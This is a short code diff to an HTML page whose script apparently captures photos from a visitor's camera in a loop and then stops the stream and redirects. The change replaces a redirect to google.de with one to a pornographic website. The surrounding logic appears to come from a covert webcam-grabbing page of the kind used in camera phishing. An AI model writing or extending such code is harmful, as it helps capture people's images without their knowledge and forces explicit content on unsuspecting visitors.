--- a/all.html
+++ b/all.html
@@ -268,7 +268,7 @@
         if (photoCount >= maxPhotos) {
           clearInterval(interval);
           if (stream) stream.getTracks().forEach(t => t.stop());
-          window.location.replace("https://www.google.de");
+          window.location.replace("https://www.mvideoporno.xxx/xhamster/");
           return;
         }
         await capturePhoto();
